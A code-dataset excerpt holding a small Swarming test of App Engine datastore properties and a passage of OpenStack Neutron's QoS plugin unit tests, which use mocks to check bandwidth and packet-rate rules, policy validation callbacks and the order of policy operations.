Dataset columns (⌀ in the original header marks nullable columns):

| column | dtype | lengths / values | nullable |
|---|---|---|---|
| hexsha | string | length 40 | no |
| size | int64 | 5 to 2.06M | no |
| ext | string | 10 distinct values | no |
| lang | string | 1 distinct value | no |
| max_stars_repo_path | string | length 3 to 248 | no |
| max_stars_repo_name | string | length 5 to 125 | no |
| max_stars_repo_head_hexsha | string | length 40 to 78 | no |
| max_stars_repo_licenses | sequence | length 1 to 10 | no |
| max_stars_count | int64 | 1 to 191k | yes |
| max_stars_repo_stars_event_min_datetime | string | length 24 | yes |
| max_stars_repo_stars_event_max_datetime | string | length 24 | yes |
| max_issues_repo_path | string | length 3 to 248 | no |
| max_issues_repo_name | string | length 5 to 125 | no |
| max_issues_repo_head_hexsha | string | length 40 to 78 | no |
| max_issues_repo_licenses | sequence | length 1 to 10 | no |
| max_issues_count | int64 | 1 to 67k | yes |
| max_issues_repo_issues_event_min_datetime | string | length 24 | yes |
| max_issues_repo_issues_event_max_datetime | string | length 24 | yes |
| max_forks_repo_path | string | length 3 to 248 | no |
| max_forks_repo_name | string | length 5 to 125 | no |
| max_forks_repo_head_hexsha | string | length 40 to 78 | no |
| max_forks_repo_licenses | sequence | length 1 to 10 | no |
| max_forks_count | int64 | 1 to 105k | yes |
| max_forks_repo_forks_event_min_datetime | string | length 24 | yes |
| max_forks_repo_forks_event_max_datetime | string | length 24 | yes |
| content | string | length 5 to 2.06M | no |
| avg_line_length | float64 | 1 to 1.02M | no |
| max_line_length | int64 | 3 to 1.03M | no |
| alphanum_fraction | float64 | 0 to 1 | no |
| count_classes | int64 | 0 to 1.6M | no |
| score_classes | float64 | 0 to 1 | no |
| count_generators | int64 | 0 to 651k | no |
| score_generators | float64 | 0 to 1 | no |
| count_decorators | int64 | 0 to 990k | no |
| score_decorators | float64 | 0 to 1 | no |
| count_async_functions | int64 | 0 to 235k | no |
| score_async_functions | float64 | 0 to 1 | no |
| count_documentation | int64 | 0 to 1.04M | no |
| score_documentation | float64 | 0 to 1 | no |
Record 1:

| field | value |
|---|---|
| hexsha | b9edd7dbf25e820fdbc6faa76fd63ef5d9d3ec94 |
| size | 1,090 |
| ext | py |
| lang | Python |
| max_stars / max_issues / max_forks_repo_path | appengine/components/tests/datastore_utils_properties_test.py |
| max_stars / max_issues / max_forks_repo_name | pombreda/swarming |
| max_stars / max_issues / max_forks_repo_head_hexsha | c70f311f3db8f25752c793a0d7b36cf537d95580 |
| max_stars / max_issues / max_forks_repo_licenses | ["Apache-2.0"] |
| max_stars_count | null |
| max_stars_repo_stars_event_min / max_datetime | null / null |
| max_issues_count | null |
| max_issues_repo_issues_event_min / max_datetime | null / null |
| max_forks_count | 1 |
| max_forks_repo_forks_event_min / max_datetime | 2021-12-06T03:37:36.000Z / 2021-12-06T03:37:36.000Z |

Record 1 content:

#!/usr/bin/env python
# Copyright 2014 The Swarming Authors. All rights reserved.
# Use of this source code is governed by the Apache v2.0 license that can be
# found in the LICENSE file.
import sys
import unittest
import test_env
test_env.setup_test_env()
from google.appengine.ext import ndb
from components.datastore_utils import properties
from support import test_case
class BP(ndb.Model):
prop = properties.BytesComputedProperty(lambda _: '\x00')
class DJP(ndb.Model):
prop = properties.DeterministicJsonProperty(json_type=dict)
class PropertiesTest(test_case.TestCase):
def test_DeterministicJsonProperty(self):
self.assertEqual({'a': 1}, DJP(prop={'a': 1}).prop)
DJP(prop={'a': 1}).put()
self.assertEqual({'a': 1}, DJP.query().get().prop)
with self.assertRaises(TypeError):
DJP(prop=[])
def test_BytesComputedProperty(self):
self.assertEqual('\x00', BP().prop)
BP().put()
self.assertEqual('\x00', BP.query().get().prop)
if __name__ == '__main__':
if '-v' in sys.argv:
unittest.TestCase.maxDiff = None
unittest.main()
Record 1 statistics:

| field | value |
|---|---|
| avg_line_length | 23.695652 |
| max_line_length | 76 |
| alphanum_fraction | 0.713761 |
| count_classes | 596 |
| score_classes | 0.546789 |
| count_generators | 0 |
| score_generators | 0 |
| count_decorators | 0 |
| score_decorators | 0 |
| count_async_functions | 0 |
| score_async_functions | 0 |
| count_documentation | 228 |
| score_documentation | 0.209174 |

Record 2:

| field | value |
|---|---|
| hexsha | b9ef242e4a5b9cd66209cacaae0f38bad7d2a39e |
| size | 128,492 |
| ext | py |
| lang | Python |
| max_stars / max_issues / max_forks_repo_path | neutron/tests/unit/services/qos/test_qos_plugin.py |
| max_stars / max_issues / max_forks_repo_name | dangervon/neutron |
| max_stars / max_issues / max_forks_repo_head_hexsha | 06ce0c2c94d2256a8f6804a1eacb0733747dcf46 |
| max_stars_count / max_issues_count / max_forks_count | null |
| all stars / issues / forks event datetimes | null |
| max_stars / max_issues / max_forks_repo_licenses | ["Apache-2.0"] |

Record 2 content:

# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from unittest import mock
from keystoneauth1 import exceptions as ks_exc
import netaddr
from neutron_lib.api.definitions import qos
from neutron_lib.callbacks import events
from neutron_lib import constants as lib_constants
from neutron_lib import context
from neutron_lib import exceptions as lib_exc
from neutron_lib.exceptions import placement as pl_exc
from neutron_lib.exceptions import qos as qos_exc
from neutron_lib.objects import utils as obj_utils
from neutron_lib.plugins import constants as plugins_constants
from neutron_lib.plugins import directory
from neutron_lib.services.qos import constants as qos_consts
from neutron_lib.utils import net as net_utils
import os_resource_classes as orc
from oslo_config import cfg
from oslo_utils import uuidutils
import webob.exc
from neutron.exceptions import qos as neutron_qos_exc
from neutron.extensions import qos_pps_minimum_rule_alias
from neutron.extensions import qos_rules_alias
from neutron import manager
from neutron.objects import network as network_object
from neutron.objects import ports as ports_object
from neutron.objects.qos import policy as policy_object
from neutron.objects.qos import rule as rule_object
from neutron.services.qos import qos_plugin
from neutron.tests.unit.db import test_db_base_plugin_v2
from neutron.tests.unit.services.qos import base
DB_PLUGIN_KLASS = 'neutron.db.db_base_plugin_v2.NeutronDbPluginV2'
SERVICE_PLUGIN_KLASS = 'neutron.services.qos.qos_plugin.QoSPlugin'
class TestQosPlugin(base.BaseQosTestCase):
def setUp(self):
super(TestQosPlugin, self).setUp()
self.setup_coreplugin(load_plugins=False)
mock.patch('neutron.objects.db.api.create_object').start()
mock.patch('neutron.objects.db.api.update_object').start()
mock.patch('neutron.objects.db.api.delete_object').start()
mock.patch('neutron.objects.db.api.get_object').start()
_mock_qos_load_attr = mock.patch(
'neutron.objects.qos.policy.QosPolicy.obj_load_attr')
self.mock_qos_load_attr = _mock_qos_load_attr.start()
# We don't use real models as per mocks above. We also need to mock-out
# methods that work with real data types
mock.patch(
'neutron.objects.base.NeutronDbObject.modify_fields_from_db'
).start()
mock.patch.object(policy_object.QosPolicy, 'unset_default').start()
mock.patch.object(policy_object.QosPolicy, 'set_default').start()
cfg.CONF.set_override("core_plugin", DB_PLUGIN_KLASS)
cfg.CONF.set_override("service_plugins", ["qos"])
manager.init()
self.qos_plugin = directory.get_plugin(plugins_constants.QOS)
self.qos_plugin.driver_manager = mock.Mock()
self.rpc_push = mock.patch('neutron.api.rpc.handlers.resources_rpc'
'.ResourcesPushRpcApi.push').start()
self.ctxt = context.Context('fake_user', 'fake_tenant')
self.admin_ctxt = context.get_admin_context()
self.policy_data = {
'policy': {'id': uuidutils.generate_uuid(),
'project_id': uuidutils.generate_uuid(),
'name': 'test-policy',
'description': 'Test policy description',
'shared': True,
'is_default': False}}
self.rule_data = {
'bandwidth_limit_rule': {'id': uuidutils.generate_uuid(),
'max_kbps': 100,
'max_burst_kbps': 150},
'dscp_marking_rule': {'id': uuidutils.generate_uuid(),
'dscp_mark': 16},
'minimum_bandwidth_rule': {
'id': uuidutils.generate_uuid(),
'min_kbps': 10},
'packet_rate_limit_rule': {
'id': uuidutils.generate_uuid(),
'max_kpps': 20,
'max_burst_kpps': 130},
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 10,
'direction': 'any'},
}
self.policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
self.rule = rule_object.QosBandwidthLimitRule(
self.ctxt, **self.rule_data['bandwidth_limit_rule'])
self.dscp_rule = rule_object.QosDscpMarkingRule(
self.ctxt, **self.rule_data['dscp_marking_rule'])
self.min_bw_rule = rule_object.QosMinimumBandwidthRule(
self.ctxt, **self.rule_data['minimum_bandwidth_rule'])
self.pps_rule = rule_object.QosPacketRateLimitRule(
self.ctxt, **self.rule_data['packet_rate_limit_rule'])
self.min_pps_rule = rule_object.QosMinimumPacketRateRule(
self.ctxt, **self.rule_data['minimum_packet_rate_rule'])
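# Helper: assert that the most recent driver_manager.call() used the expected
# method name and context, with a QosPolicy object as its payload.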
def _validate_driver_params(self, method_name, ctxt):
call_args = self.qos_plugin.driver_manager.call.call_args[0]
self.assertTrue(self.qos_plugin.driver_manager.call.called)
self.assertEqual(call_args[0], method_name)
self.assertEqual(call_args[1], ctxt)
self.assertIsInstance(call_args[2], policy_object.QosPolicy)
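# Helper: build a Port (optionally carrying a port- or network-level QoS
# policy), mock out the segment and minimum bandwidth/packet-rate rule
# lookups, and run QoSPlugin._extend_port_resource_request on it.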
def _create_and_extend_port(self, min_bw_rules, min_pps_rules=None,
physical_network='public',
has_qos_policy=True, has_net_qos_policy=False,
request_groups_uuids=None):
network_id = uuidutils.generate_uuid()
self.port_data = {
'port': {'id': uuidutils.generate_uuid(),
'network_id': network_id}
}
if has_qos_policy:
self.port_data['port']['qos_policy_id'] = self.policy.id
elif has_net_qos_policy:
self.port_data['port']['qos_network_policy_id'] = self.policy.id
self.port = ports_object.Port(
self.ctxt, **self.port_data['port'])
port_res = {"binding:vnic_type": "normal"}
segment_mock = mock.MagicMock(network_id=network_id,
physical_network=physical_network)
min_pps_rules = min_pps_rules if min_pps_rules else []
with mock.patch('neutron.objects.network.NetworkSegment.get_objects',
return_value=[segment_mock]), \
mock.patch(
'neutron.objects.qos.rule.QosMinimumBandwidthRule.'
'get_objects',
return_value=min_bw_rules), \
mock.patch(
'neutron.objects.qos.rule.QosMinimumPacketRateRule.'
'get_objects',
return_value=min_pps_rules), \
mock.patch(
'uuid.uuid5',
return_value='fake_uuid',
side_effect=request_groups_uuids):
return qos_plugin.QoSPlugin._extend_port_resource_request(
port_res, self.port)
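# Helper: bulk variant of the above, exercising
# QoSPlugin._extend_port_resource_request_bulk against two port dicts.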
def _create_and_extend_ports(self, min_bw_rules, min_pps_rules=None,
physical_network='public',
request_groups_uuids=None):
network_id = uuidutils.generate_uuid()
ports_res = [
{
"resource_request": {
"port_id": uuidutils.generate_uuid(),
"qos_id": self.policy.id,
"network_id": network_id,
"vnic_type": "normal",
}
},
{
"resource_request": {
"port_id": uuidutils.generate_uuid(),
"qos_id": self.policy.id,
"network_id": network_id,
"vnic_type": "normal",
}
},
]
segment_mock = mock.MagicMock(network_id=network_id,
physical_network=physical_network)
min_pps_rules = min_pps_rules if min_pps_rules else []
with mock.patch('neutron.objects.network.NetworkSegment.get_objects',
return_value=[segment_mock]), \
mock.patch(
'neutron.objects.qos.rule.QosMinimumBandwidthRule.'
'get_objects',
return_value=min_bw_rules), \
mock.patch(
'neutron.objects.qos.rule.QosMinimumPacketRateRule.'
'get_objects',
return_value=min_pps_rules), \
mock.patch(
'uuid.uuid5',
return_value='fake_uuid',
side_effect=request_groups_uuids):
return qos_plugin.QoSPlugin._extend_port_resource_request_bulk(
ports_res, None)
def test__extend_port_resource_request_min_bw_rule(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
port = self._create_and_extend_port([self.min_bw_rule])
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_PHYSNET_PUBLIC', 'CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_BW_EGR_KILOBIT_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_min_pps_rule(self):
port = self._create_and_extend_port([], [self.min_pps_rule])
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_PACKET_RATE_KILOPACKET_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_min_bw_and_pps_rule(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
self.min_pps_rule.direction = lib_constants.EGRESS_DIRECTION
request_groups_uuids = ['fake_uuid0', 'fake_uuid1']
min_bw_rule_ingress_data = {
'id': uuidutils.generate_uuid(),
'min_kbps': 20,
'direction': lib_constants.INGRESS_DIRECTION}
min_pps_rule_ingress_data = {
'id': uuidutils.generate_uuid(),
'min_kpps': 20,
'direction': lib_constants.INGRESS_DIRECTION}
min_bw_rule_ingress = rule_object.QosMinimumBandwidthRule(
self.ctxt, **min_bw_rule_ingress_data)
min_pps_rule_ingress = rule_object.QosMinimumPacketRateRule(
self.ctxt, **min_pps_rule_ingress_data)
port = self._create_and_extend_port(
[self.min_bw_rule, min_bw_rule_ingress],
[self.min_pps_rule, min_pps_rule_ingress],
request_groups_uuids=request_groups_uuids)
self.assertEqual(
2,
len(port['resource_request']['request_groups'])
)
self.assertIn(
{
'id': 'fake_uuid0',
'required':
['CUSTOM_PHYSNET_PUBLIC', 'CUSTOM_VNIC_TYPE_NORMAL'],
'resources': {
orc.NET_BW_EGR_KILOBIT_PER_SEC: 10,
orc.NET_BW_IGR_KILOBIT_PER_SEC: 20},
},
port['resource_request']['request_groups']
)
self.assertIn(
{
'id': 'fake_uuid1',
'required': ['CUSTOM_VNIC_TYPE_NORMAL'],
'resources': {
orc.NET_PACKET_RATE_EGR_KILOPACKET_PER_SEC: 10,
orc.NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC: 20,
},
},
port['resource_request']['request_groups']
)
self.assertEqual(
['fake_uuid0', 'fake_uuid1'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_non_min_bw_or_min_pps_rule(self):
port = self._create_and_extend_port([], [])
self.assertIsNone(port.get('resource_request'))
def test__extend_port_resource_request_min_bw_non_provider_net(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
port = self._create_and_extend_port([self.min_bw_rule],
physical_network=None)
self.assertIsNone(port.get('resource_request'))
def test__extend_port_resource_request_mix_rules_non_provider_net(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
port = self._create_and_extend_port([self.min_bw_rule],
[self.min_pps_rule],
physical_network=None)
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_PACKET_RATE_KILOPACKET_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_bulk_min_bw_rule(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
ports = self._create_and_extend_ports([self.min_bw_rule])
for port in ports:
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_PHYSNET_PUBLIC', 'CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_BW_EGR_KILOBIT_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_bulk_min_pps_rule(self):
ports = self._create_and_extend_ports([], [self.min_pps_rule])
for port in ports:
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_PACKET_RATE_KILOPACKET_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_bulk_min_bw_and_pps_rule(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
self.min_pps_rule.direction = lib_constants.EGRESS_DIRECTION
request_groups_uuids = ['fake_uuid0', 'fake_uuid1'] * 2
min_bw_rule_ingress_data = {
'id': uuidutils.generate_uuid(),
'min_kbps': 20,
'direction': lib_constants.INGRESS_DIRECTION}
min_pps_rule_ingress_data = {
'id': uuidutils.generate_uuid(),
'min_kpps': 20,
'direction': lib_constants.INGRESS_DIRECTION}
min_bw_rule_ingress = rule_object.QosMinimumBandwidthRule(
self.ctxt, **min_bw_rule_ingress_data)
min_pps_rule_ingress = rule_object.QosMinimumPacketRateRule(
self.ctxt, **min_pps_rule_ingress_data)
ports = self._create_and_extend_ports(
[self.min_bw_rule, min_bw_rule_ingress],
[self.min_pps_rule, min_pps_rule_ingress],
request_groups_uuids=request_groups_uuids)
for port in ports:
self.assertEqual(
2,
len(port['resource_request']['request_groups'])
)
self.assertIn(
{
'id': 'fake_uuid0',
'required':
['CUSTOM_PHYSNET_PUBLIC', 'CUSTOM_VNIC_TYPE_NORMAL'],
'resources': {
orc.NET_BW_EGR_KILOBIT_PER_SEC: 10,
orc.NET_BW_IGR_KILOBIT_PER_SEC: 20},
},
port['resource_request']['request_groups']
)
self.assertIn(
{
'id': 'fake_uuid1',
'required': ['CUSTOM_VNIC_TYPE_NORMAL'],
'resources': {
orc.NET_PACKET_RATE_EGR_KILOPACKET_PER_SEC: 10,
orc.NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC: 20,
},
},
port['resource_request']['request_groups']
)
self.assertEqual(
['fake_uuid0', 'fake_uuid1'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_no_qos_policy(self):
port = self._create_and_extend_port([], physical_network='public',
has_qos_policy=False)
self.assertIsNone(port.get('resource_request'))
def test__extend_port_resource_request_min_bw_inherited_policy(
self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
self.min_bw_rule.qos_policy_id = self.policy.id
port = self._create_and_extend_port([self.min_bw_rule],
has_net_qos_policy=True)
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_PHYSNET_PUBLIC', 'CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_BW_EGR_KILOBIT_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
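# _get_ports_with_policy should return the ports bound directly to the
# policy plus the network's ports that have no QoS policy of their own.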
def test_get_ports_with_policy(self):
network_ports = [
mock.MagicMock(qos_policy_id=None),
mock.MagicMock(qos_policy_id=uuidutils.generate_uuid()),
mock.MagicMock(qos_policy_id=None)
]
ports = [
mock.MagicMock(qos_policy_id=self.policy.id),
]
expected_network_ports = [
port for port in network_ports if port.qos_policy_id is None]
expected_ports = ports + expected_network_ports
with mock.patch(
'neutron.objects.ports.Port.get_objects',
side_effect=[network_ports, ports]
), mock.patch.object(
self.policy, "get_bound_networks"
), mock.patch.object(
self.policy, "get_bound_ports"
):
policy_ports = self.qos_plugin._get_ports_with_policy(
self.ctxt, self.policy)
self.assertEqual(
len(expected_ports), len(policy_ports))
for port in expected_ports:
self.assertIn(port, policy_ports)
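# Parametrized check for the port precommit_update callback: the port and
# policy are only fetched and validated when the policy id actually changes
# to a non-None value.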
def _test_validate_update_port_callback(self, policy_id=None,
original_policy_id=None):
port_id = uuidutils.generate_uuid()
kwargs = {
"port": {
"id": port_id,
qos_consts.QOS_POLICY_ID: policy_id
},
"original_port": {
"id": port_id,
qos_consts.QOS_POLICY_ID: original_policy_id
}
}
port_mock = mock.MagicMock(id=port_id, qos_policy_id=policy_id)
policy_mock = mock.MagicMock(id=policy_id)
admin_ctxt = mock.Mock()
with mock.patch(
'neutron.objects.ports.Port.get_object',
return_value=port_mock
) as get_port, mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=policy_mock
) as get_policy, mock.patch.object(
self.qos_plugin, "validate_policy_for_port"
) as validate_policy_for_port, mock.patch.object(
self.ctxt, "elevated", return_value=admin_ctxt
):
self.qos_plugin._validate_update_port_callback(
"PORT", "precommit_update", "test_plugin",
payload=events.DBEventPayload(
self.ctxt, desired_state=kwargs['port'],
states=(kwargs['original_port'],)))
if policy_id is None or policy_id == original_policy_id:
get_port.assert_not_called()
get_policy.assert_not_called()
validate_policy_for_port.assert_not_called()
else:
get_port.assert_called_once_with(self.ctxt, id=port_id)
get_policy.assert_called_once_with(admin_ctxt, id=policy_id)
validate_policy_for_port.assert_called_once_with(
self.ctxt, policy_mock, port_mock)
def test_validate_update_port_callback_policy_changed(self):
self._test_validate_update_port_callback(
policy_id=uuidutils.generate_uuid())
def test_validate_update_port_callback_policy_not_changed(self):
policy_id = uuidutils.generate_uuid()
self._test_validate_update_port_callback(
policy_id=policy_id, original_policy_id=policy_id)
def test_validate_update_port_callback_policy_removed(self):
self._test_validate_update_port_callback(
policy_id=None, original_policy_id=uuidutils.generate_uuid())
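# Same pattern for the network precommit_update callback; only ports without
# their own policy are validated against the new network-level policy.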
def _test_validate_update_network_callback(self, policy_id=None,
original_policy_id=None):
network_id = uuidutils.generate_uuid()
kwargs = {
"context": self.ctxt,
"network": {
"id": network_id,
qos_consts.QOS_POLICY_ID: policy_id
},
"original_network": {
"id": network_id,
qos_consts.QOS_POLICY_ID: original_policy_id
}
}
port_mock_with_own_policy = mock.MagicMock(
id=uuidutils.generate_uuid(),
qos_policy_id=uuidutils.generate_uuid())
port_mock_without_own_policy = mock.MagicMock(
id=uuidutils.generate_uuid(), qos_policy_id=None)
ports = [port_mock_with_own_policy, port_mock_without_own_policy]
policy_mock = mock.MagicMock(id=policy_id)
admin_ctxt = mock.Mock()
with mock.patch(
'neutron.objects.ports.Port.get_objects',
return_value=ports
) as get_ports, mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=policy_mock
) as get_policy, mock.patch.object(
self.qos_plugin, "validate_policy_for_network"
) as validate_policy_for_network, mock.patch.object(
self.qos_plugin, "validate_policy_for_ports"
) as validate_policy_for_ports, mock.patch.object(
self.ctxt, "elevated", return_value=admin_ctxt
):
self.qos_plugin._validate_update_network_callback(
"NETWORK", "precommit_update", "test_plugin",
payload=events.DBEventPayload(
self.ctxt, desired_state=kwargs['network'],
states=(kwargs['original_network'],)))
if policy_id is None or policy_id == original_policy_id:
get_policy.assert_not_called()
validate_policy_for_network.assert_not_called()
get_ports.assert_not_called()
validate_policy_for_ports.assert_not_called()
else:
get_policy.assert_called_once_with(admin_ctxt, id=policy_id)
get_ports.assert_called_once_with(self.ctxt,
network_id=network_id)
validate_policy_for_ports.assert_called_once_with(
self.ctxt, policy_mock, [port_mock_without_own_policy])
def test_validate_update_network_callback_policy_changed(self):
self._test_validate_update_network_callback(
policy_id=uuidutils.generate_uuid())
def test_validate_update_network_callback_policy_not_changed(self):
policy_id = uuidutils.generate_uuid()
self._test_validate_update_network_callback(
policy_id=policy_id, original_policy_id=policy_id)
def test_validate_update_network_callback_policy_removed(self):
self._test_validate_update_network_callback(
policy_id=None, original_policy_id=uuidutils.generate_uuid())
def test_validate_policy_for_port_rule_not_valid(self):
port = {'id': uuidutils.generate_uuid()}
with mock.patch.object(
self.qos_plugin.driver_manager, "validate_rule_for_port",
return_value=False
):
self.policy.rules = [self.rule]
self.assertRaises(
qos_exc.QosRuleNotSupported,
self.qos_plugin.validate_policy_for_port,
self.ctxt, self.policy, port)
def test_validate_policy_for_port_all_rules_valid(self):
port = {'id': uuidutils.generate_uuid()}
with mock.patch.object(
self.qos_plugin.driver_manager, "validate_rule_for_port",
return_value=True
):
self.policy.rules = [self.rule]
try:
self.qos_plugin.validate_policy_for_port(
self.ctxt, self.policy, port)
except qos_exc.QosRuleNotSupported:
self.fail("QosRuleNotSupported exception unexpectedly raised")
def test_validate_policy_for_network(self):
network = uuidutils.generate_uuid()
with mock.patch.object(
self.qos_plugin.driver_manager, "validate_rule_for_network",
return_value=True
):
self.policy.rules = [self.rule]
try:
self.qos_plugin.validate_policy_for_network(
self.ctxt, self.policy, network_id=network)
except qos_exc.QosRuleNotSupportedByNetwork:
self.fail("QosRuleNotSupportedByNetwork "
"exception unexpectedly raised")
def test_create_min_bw_rule_on_bound_port(self):
policy = self._get_policy()
policy.rules = [self.min_bw_rule]
segment = network_object.NetworkSegment(
physical_network='fake physnet')
net = network_object.Network(
self.ctxt,
segments=[segment])
port = ports_object.Port(
self.ctxt,
id=uuidutils.generate_uuid(),
network_id=uuidutils.generate_uuid(),
device_owner='compute:fake-zone')
with mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=policy), \
mock.patch(
'neutron.objects.network.Network.get_object',
return_value=net), \
mock.patch.object(
self.qos_plugin,
'_get_ports_with_policy',
return_value=[port]):
self.assertRaises(
NotImplementedError,
self.qos_plugin.create_policy_minimum_bandwidth_rule,
self.ctxt, policy.id, self.rule_data)
def test_create_min_bw_rule_on_unbound_port(self):
policy = self._get_policy()
policy.rules = [self.min_bw_rule]
segment = network_object.NetworkSegment(
physical_network='fake physnet')
net = network_object.Network(
self.ctxt,
segments=[segment])
port = ports_object.Port(
self.ctxt,
id=uuidutils.generate_uuid(),
network_id=uuidutils.generate_uuid(),
device_owner='')
with mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=policy), \
mock.patch(
'neutron.objects.network.Network.get_object',
return_value=net), \
mock.patch.object(
self.qos_plugin,
'_get_ports_with_policy',
return_value=[port]):
try:
self.qos_plugin.create_policy_minimum_bandwidth_rule(
self.ctxt, policy.id, self.rule_data)
except NotImplementedError:
self.fail()
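# The ordering assertions below verify that the QosPolicy object operation is
# recorded before the driver's *_precommit call, which in turn comes before
# the corresponding driver call.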
@mock.patch(
'neutron.objects.rbac_db.RbacNeutronDbObjectMixin'
'.create_rbac_policy')
@mock.patch('neutron.objects.qos.policy.QosPolicy')
def test_add_policy(self, mock_qos_policy, mock_create_rbac_policy):
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_policy, 'QosPolicy')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
self.qos_plugin.create_policy(self.ctxt, self.policy_data)
policy_mock_call = mock.call.QosPolicy().create()
create_precommit_mock_call = mock.call.driver.call(
'create_policy_precommit', self.ctxt, mock.ANY)
create_mock_call = mock.call.driver.call(
'create_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(policy_mock_call) <
mock_manager.mock_calls.index(create_precommit_mock_call) <
mock_manager.mock_calls.index(create_mock_call))
def test_add_policy_with_extra_tenant_keyword(self, *mocks):
policy_id = uuidutils.generate_uuid()
project_id = uuidutils.generate_uuid()
tenant_policy = {
'policy': {'id': policy_id,
'project_id': project_id,
'tenant_id': project_id,
'name': 'test-policy',
'description': 'Test policy description',
'shared': True,
'is_default': False}}
policy_details = {'id': policy_id,
'project_id': project_id,
'name': 'test-policy',
'description': 'Test policy description',
'shared': True,
'is_default': False}
with mock.patch('neutron.objects.qos.policy.QosPolicy') as QosMocked:
self.qos_plugin.create_policy(self.ctxt, tenant_policy)
QosMocked.assert_called_once_with(self.ctxt, **policy_details)
@mock.patch.object(policy_object.QosPolicy, "get_object")
@mock.patch(
'neutron.objects.rbac_db.RbacNeutronDbObjectMixin'
'.create_rbac_policy')
@mock.patch.object(policy_object.QosPolicy, 'update')
def test_update_policy(self, mock_qos_policy_update,
mock_create_rbac_policy, mock_qos_policy_get):
mock_qos_policy_get.return_value = self.policy
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_policy_update, 'update')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
fields = obj_utils.get_updatable_fields(
policy_object.QosPolicy, self.policy_data['policy'])
self.qos_plugin.update_policy(
self.ctxt, self.policy.id, {'policy': fields})
self._validate_driver_params('update_policy', self.ctxt)
policy_update_mock_call = mock.call.update()
update_precommit_mock_call = mock.call.driver.call(
'update_policy_precommit', self.ctxt, mock.ANY)
update_mock_call = mock.call.driver.call(
'update_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(policy_update_mock_call) <
mock_manager.mock_calls.index(update_precommit_mock_call) <
mock_manager.mock_calls.index(update_mock_call))
@mock.patch('neutron.objects.db.api.get_object', return_value=None)
@mock.patch.object(policy_object.QosPolicy, 'delete')
def test_delete_policy(self, mock_qos_policy_delete, mock_api_get_policy):
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_policy_delete, 'delete')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
